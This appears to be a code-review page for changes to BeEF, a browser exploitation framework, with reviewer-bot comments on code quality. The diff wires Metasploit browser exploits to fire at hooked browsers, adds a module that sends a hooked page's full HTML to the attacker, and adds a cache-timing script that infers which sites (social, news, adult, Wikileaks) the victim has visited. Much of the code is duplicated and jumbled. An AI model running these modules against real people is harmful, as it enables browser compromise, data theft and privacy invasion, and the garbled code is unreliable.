BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
}
print "\r\n"
else
else
msf_modules = msf.call('module.exploits')
count = 1
msf_modules['modules'].each{|m|
next if not m.include? "/browser/"
m_details = msf.call('module.info', 'exploit', m)
if m_details
key = 'msf_'+m.split('/').last
# system currently doesn't support multilevel categories
#categories = ['Metasploit']
#m.split('/')[0...-1].each{|c|
# categories.push(c.capitalize)
#}
msf_module_config[key] = {
'enable'=> true,
'msf'=> true,
'msf_key' => m,
'name'=> m_details['name'],
'category' => 'Metasploit',
'description'=> m_details['description'],
'authors'=> m_details['references'],
'path'=> path,
'class'=> 'Msf_module'
}
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key,nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
end
msf_modules['modules'].each { |m|
next if not m.include? "/browser/"
m_details = msf.call('module.info', 'exploit', m)
if m_details
key = 'msf_'+m.split('/').last
# system currently doesn't support multilevel categories
#categories = ['Metasploit']
#m.split('/')[0...-1].each{|c|
# categories.push(c.capitalize)
#}
msf_module_config[key] = {
'enable'=> true,
'msf'=> true,
'msf_key' => m,
'name'=> m_details['name'],
'category' => 'Metasploit',
'description'=> m_details['description'],
'authors'=> m_details['references'],
'path'=> path,
'class'=> 'Msf_module'
}
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key, nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
end
}
print "\r\n"
File.open("#{path}msf-exploits.cache", "w") do |f|
f.write(msf_module_config.to_yaml)
print_debug "Wrote Metasploit exploits to cache file"
f.write(msf_module_config.to_yaml)
print_debug "Wrote Metasploit exploits to cache file"
end
end
BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
end
BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
end
end
end
# Get module options + payloads when the beef framework requests this information
def self.get_options(mod)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'exploit', msf_key)
com = BeEF::Core::Models::CommandModule.first(:name => mod )
if msf_module_options
# Get module options + payloads when the beef framework requests this information
def self.get_options(mod)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'exploit', msf_key)
com = BeEF::Core::Models::CommandModule.first(:name => mod)
if msf_module_options
options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
options << { 'name' => 'mod_id', 'id' => 'mod_id' , 'type' => 'hidden', 'value' => com.id}
options << {'name' => 'mod_id', 'id' => 'mod_id', 'type' => 'hidden', 'value' => com.id}
msf_payload_options = msf.call('module.compatible_payloads', msf_key)
if msf_payload_options
options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
return options
options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
return options
else
print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
end
else
else
print_error "Unable to retrieve metasploit options for exploit: #{msf_key}"
end
end
end
end
end
# Execute function for all metasploit exploits
def self.override_execute(mod, hbsession, opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf_opts = {}
# Execute function for all metasploit exploits
def self.override_execute(mod, hbsession, opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf_opts = {}
opts.each { |opt|
next if ['e','ie_session','and_module_id'].include? opt['name']
msf_opts[opt["name"]] = opt["value"]
}
opts.each { |opt|
next if ['e', 'ie_session', 'and_module_id'].include? opt['name']
msf_opts[opt["name"]] = opt["value"]
}
if msf_key != nil and msf.login
# Are the options correctly formatted for msf?
# This call has not been tested
msf.call('module.execute', 'exploit', msf_key, msf_opts)
end
if msf_key != nil and msf.login
# Are the options correctly formatted for msf?
# This call has not been tested
msf.call('module.execute', 'exploit', msf_key, msf_opts)
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
end
bopts = []
uri = ""
if msf_opts['SSL']
uri += "https://"
else
uri += "http://"
end
config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
bopts = []
uri = ""
if msf_opts['SSL']
uri += "https://"
else
uri += "http://"
end
config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
bopts << { :sploit_url => uri }
c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
bopts << {:sploit_url => uri}
c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
# Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
# which exploits where executed against which hooked browsers
return true
end
# Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
# which exploits where executed against which hooked browsers
return true
end
# Get module options + payloads when the beef framework requests this information
def self.get_payload_options(mod,payload)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
# Get module options + payloads when the beef framework requests this information
def self.get_payload_options(mod, payload)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'payload', payload)
com = BeEF::Core::Models::CommandModule.first(:name => mod )
if msf_module_options
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'payload', payload)
com = BeEF::Core::Models::CommandModule.first(:name => mod)
if msf_module_options
options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
return options
else
else
print_error "Unable to retrieve metasploit payload options for exploit: #{msf_key}"
end
end
end
end
end
end
end
end
end
end
end
end
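Review bot: almost all of this hunk is re-indentation, which buries the one functional change (`BeEF::Extension::Console.resetdb?` becoming `BeEF::Core::Console::CommandLine.parse[:resetdb]`); please split whitespace-only changes into their own commit. Problems in the code as it stands: `if msf_opts['SSL']` tests a value taken straight from the submitted options, so a string such as "false" is truthy and yields an https:// URL; the return value of `msf.call('module.execute', ...)` is ignored (the comment even says the call is untested) yet the method still queues a `Command` and returns `true`; `uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']` raises TypeError if `SRVPORT` or `URIPATH` is absent; and `'authors' => m_details['references']` stores the module's references under the authors key. The `rescue => e; puts e` around `YAML.load(raw)` also swallows a corrupt cache file and carries on with an empty `msf_module_config`.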

@@ -37,13 +37,19 @@ module BeEF
def handle_request socket
request_line = socket.readline
# HTTP method # defaults to GET
method = request_line[/^\w+/]
url = request_line[/^\w+\s+(\S+)/, 1]
# HTTP version # defaults to 1.0
version = request_line[/HTTP\/(1\.\d)\s*$/, 1]
version = "1.0" if version.nil?
# url # host:port/path
url = request_line[/^\w+\s+(\S+)/, 1]
# We're overwriting the URI::Parser UNRESERVED regex to prevent BAD URI errors when sending attack vectors (see tolerant_parser)
tolerant_parser = URI::Parser.new(:UNRESERVED => BeEF::Core::Configuration.instance.get("beef.extension.requester.uri_unreserved_chars"))
uri = tolerant_parser.parse(url)
uri = tolerant_parser.parse(url.to_s)
raw_request = request_line
content_length = 0
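Review bot: the comment "# HTTP method # defaults to GET" is not true: `method = request_line[/^\w+/]` yields nil on a malformed request line and nothing assigns a default, unlike `version`, which does fall back to "1.0". Either add `method = "GET" if method.nil?` or, better, reject the request when `method` or `url` is nil, since `tolerant_parser.parse(url.to_s)` will otherwise parse an empty string and the code below will operate on a URI with no host.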

@@ -25,7 +25,7 @@ module Qrcode
require 'uri'
configuration = BeEF::Core::Configuration.instance
BeEF::Extension::Console::Banners.interfaces.each do |int|
BeEF::Core::Console::Banners.interfaces.each do |int|
print_success "QRCode images available for interface: #{int}"
data = ""
configuration.get("beef.extension.qrcode.target").each do |target|

@@ -65,16 +65,16 @@ module BeEF
#@note: retrieve HTTP headers values needed later, and the \r\n that indicates the start of the post-data (if any)
req_parts.each_with_index do |value, index|
if value.match(/^Content-Length/)
@content_length = Integer(req_parts[index].split(/: /)[1])
if value.match(/^Content-Length:\s+(\d+)/)
@content_length = Integer(req_parts[index].split(/:\s+/)[1])
end
if value.match(/^Host/)
@host = req_parts[index].split(/: /)[1].split(/:/)[0]
@port = req_parts[index].split(/: /)[1].split(/:/)[1]
@host = req_parts[index].split(/:\s+/)[1].split(/:/)[0]
@port = req_parts[index].split(/:\s+/)[1].split(/:/)[1]
end
if value.eql?("") or value.strip.empty?# this will be the CRLF (before HTTP request body)
if value.eql?("") or value.strip.empty? # this will be the CRLF (before HTTP request body)
@post_data_index = index
end
end
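Review bot: `^Content-Length:\s+(\d+)` requires at least one space after the colon, but `Content-Length:123` is valid HTTP and will now be skipped, leaving `@content_length` at 0 and the body unread; match `/^Content-Length:\s*(\d+)/i` and use the capture (`@content_length = Integer($1)`) instead of re-splitting the line. The Host branch has the same `\s+` assumption and then splits on ":" to separate host from port, which breaks for IPv6 literals such as `[::1]:3000`.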
@@ -111,7 +111,7 @@ module BeEF
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'host' => @host.strip,
'host' => @host,
'port' => @port,
'data' => @post_data,
'uri' => uri,
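Review bot: dropping `.strip` on `@host` is only safe if the header parsing hunk above guarantees the value has no trailing "\r"; that code splits on `/:\s+/` and takes `[1].split(/:/)[0]`, which does not remove a trailing CR when `req_parts` was split on "\n" alone. Either keep `.strip` here (and in the second hunk below) or strip once where `@host` is assigned.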
@@ -123,7 +123,7 @@ module BeEF
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'host' => @host.strip,
'host' => @host,
'port' => @port,
'uri' => uri,
'headers' => headers,

@@ -77,7 +77,7 @@ module BeEF
)
xssrays_detail.save
end
print_info("[XSSRAYS] Received ray from HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
print_debug("[XSSRAYS] Ray info: \n #{@request.query_string}")
end

@@ -23,7 +23,7 @@ if RUBY_VERSION < '1.9'
puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
puts ""
puts "OSX:"
puts "sudo port install ruby19 +nosuffix"
puts "See README"
puts "\n"
exit
end
@@ -36,3 +36,4 @@ puts "\nRun bundler in your BeEF folder: bundle install"
puts "\nRun BeEF: ./beef"
#Testing fork regroup
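Review bot: `#Testing fork regroup` is a leftover test comment in the install script and should be removed before merge.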

@@ -0,0 +1,21 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});
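Review bot: the check reports "Enabled" whenever `window.console.exception` exists, not only when Firebug's own `console.firebug` property is present; if any other console implementation defines `exception`, the module will false-positive. Since the module is marked as working on Firefox only this is tolerable, but say so in the description, and consider reporting which of the two properties matched so the operator can judge the result.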

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
detect_firebug:
enable: true
category: "Browser"
name: "Detect FireBug"
description: "This module checks if the Mozilla Firefox Firebug extension is being use to inspect the current window."
authors: ["bcoles"]
target:
working: ["FF"]
not_working: ["All"]
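Review bot: `target:` lists `working: ["FF"]` together with `not_working: ["All"]`; if "All" covers every browser, the two entries contradict each other, so confirm how BeEF resolves that and list the non-working browsers explicitly instead. The description also has a typo: "is being use" should be "is being used".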

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_firebug < BeEF::Core::Command
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] if not @datastore['firebug'].nil?
save content
end
end

@@ -16,18 +16,17 @@
beef.execute(function() {
try {
var html_head = escape(document.head.innerHTML.toString());
var html_head = document.head.innerHTML.toString();
} catch (e) {
var html_head = "Error: document has no head";
}
try {
var html_body = escape(document.body.innerHTML.toString());
var html_body = document.body.innerHTML.toString();
} catch (e) {
var html_body = "Error: document has no body";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head);
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'body='+html_body);
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body);
});
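Review bot: removing `escape()` means `html_head` and `html_body` are concatenated raw into `'head='+html_head+'&body='+html_body`; any `&`, `=` or `+` in the page's markup will be read as a parameter delimiter when the server splits the query, so the body will be truncated or spill into extra parameters. Unless `beef.net.send` URL-encodes its data argument (not visible here), wrap both values in `encodeURIComponent()`. Merging the two sends into one request is an improvement, but if the transport is a GET request, very large pages may now exceed the URL length limit that the old two-request form was less likely to hit.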

@@ -17,7 +17,8 @@ class Get_page_html < BeEF::Core::Command
def post_execute
content = {}
content['html'] = @datastore['html']
content['head'] = @datastore['head']
content['body'] = @datastore['body']
save content
end
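Review bot: `content['head'] = @datastore['head']` and `content['body'] = @datastore['body']` store nil when the hook failed to send a value; the `Detect_firebug` command in this change set guards with `if not @datastore[...].nil?`, and the same guard here keeps the saved result free of empty keys.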

@@ -0,0 +1,344 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
var hidden_iframe = beef.dom.createInvisibleIframe();
hidden_iframe.setAttribute('id','f');
hidden_iframe.setAttribute('name','f');
hidden_iframe.setAttribute('src','about:blank');
hidden_iframe.setAttribute('style','opacity: 0.1');
var results = "";
var tries = 0;
var isIE = 0;
var isFF = 0;
/*******************************
* SUB-MS TIMER IMPLEMENTATION *
*******************************/
var cycles = 0;
var exec_next = null;
function timer_interrupt() {
cycles++;
if (exec_next) {
var cmd = exec_next;
exec_next = null;
cmd();
}
}
if (beef.browser.isFF() == 1) {
window.addEventListener('message', timer_interrupt, false);
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
{ 'category': 'Coding' },
{ 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
{ 'category': 'Security' },
{ 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
{ 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
{ 'category': 'Email' },
{ 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
}
if (beef.browser.isIE() == 1) {
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png',
'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] },
{ 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico',
'https://twitter.com/phoenix/favicon.ico' ] },
{ 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png',
'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] },
{ 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] },
{ 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] },
{ 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] },
{ 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif',
'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico',
'http://a.fsdn.com/sd/logo_w_l.png' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] },
{ 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] },
{ 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 1;
var MAX_ATTEMPTS = 1;
}
function sched_call(fn) {
exec_next = fn;
window.postMessage('123', '*');
}
/**********************
* MAIN STATE MACHINE *
**********************/
var log_area;
var target_off = 0;
var attempt = 0;
var confirmed_visited = false;
var current_url, current_name;
var wait_cycles;
var frame_ready = false;
var start, stop, urls;
/* The frame was just pointed to data:... at this point. Initialize a new test, giving the
frame some time to fully load. */
function perform_check() {
wait_cycles = 0;
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_read, 0);
}
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
}
/* Confirm that data:... is loaded correctly. */
function wait_for_read() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (beef.browser.isFF() == 1) {
if (!frame_ready) {
setTimeout(wait_for_read, 1);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
}
}
if (beef.browser.isIE() == 1) {
try{
if (frames['f'].location.href != 'about:blank') throw 1;
//if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1;
document.getElementById("f").src ='javascript:"<body onload=\'parent.frame_ready = true\'>"';
setTimeout(wait_for_read2, 0);
} catch (e) {
setTimeout(wait_for_read, 0);
}
}
}
function wait_for_read2() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (!frame_ready) {
setTimeout(wait_for_read2, 0);
} else {
setTimeout(navigate_to_target, 1);
}
}
/* Navigate the frame to the target URL. */
function navigate_to_target() {
cycles = 0;
if (beef.browser.isFF() == 1) {
sched_call(wait_for_noread);
}
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
urls++;
document.getElementById("f").src = current_url;
}
/* The browser is now trying to load the destination URL. Let's see if
we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache
hit. If not, seems like cache miss. In both cases, the navigation
will be aborted by maybe_test_next(). */
function wait_for_noread() {
try {
if (beef.browser.isIE() == 1) {
if (frames['f'].location.href == undefined){
confirmed_visited = true;
throw 1;
}
if (cycles++ >= TIME_LIMIT) {
maybe_test_next();
return;
}
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isFF() == 1) {
if (document.getElementById('f').contentWindow.location.href == undefined)
{
confirmed_visited = true;
throw 1;
}
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
}
} catch (e) {
confirmed_visited = true;
maybe_test_next();
}
}
function maybe_test_next() {
frame_ready = false;
if (beef.browser.isFF() == 1) {
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
}
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (target_off < targets.length) {
if (targets[target_off].category) {
//log_text(targets[target_off].category + ':', 'p', 'category');
target_off++;
}
if (confirmed_visited) {
log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited');
}
if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) {
if (!confirmed_visited)
//continue;
log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited');
confirmed_visited = false;
target_off++;
attempt = 0;
maybe_test_next();
} else {
current_url = targets[target_off].urls[attempt % targets[target_off].urls.length];
current_name = targets[target_off].name;
attempt++;
perform_check();
}
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
//alert(str);
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,3000);
}
}
function reload(){
//window.location.href=window.location.href;
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
urls = 0;
results = "";
maybe_test_next();
}
else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
}
}
beef.execute(function() {
urls = undefined;
exec_next = null;
start_stuff();
});
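Review bot: `cycles`, `results` and `exec_next` are assigned but never declared (`cycles = 0;` in navigate_to_target, `results = "";` in start_stuff, `exec_next = fn;` in sched_call), so they become implicit globals on the hooked page; declare them next to `var target_off`, `var attempt`. In wait_for_noread the Firefox branch tests `if (cycles >= TIME_LIMIT)` but, unlike the IE branch's `if (cycles++ >= TIME_LIMIT)`, nothing in these lines increments `cycles`, so unless the postMessage handler that runs `exec_next` does it, the Firefox path can only finish through the exception and never reports "Not visited". In maybe_test_next the `if (!confirmed_visited)` followed by the commented-out `//continue;` makes the `log_text('Not visited: ...')` call on the next line the body of the if; that is what was intended, but it is easy to misread, so add braces and drop the dead comment. `'results=' + results` is sent without encodeURIComponent, so the `+` in `'[' + cycles + '+]'` arrives server-side as a space. The comment "Decides what to do next. May schedule another attempt..." describes maybe_test_next but sits above start_stuff; move it back to the function it documents.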

View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
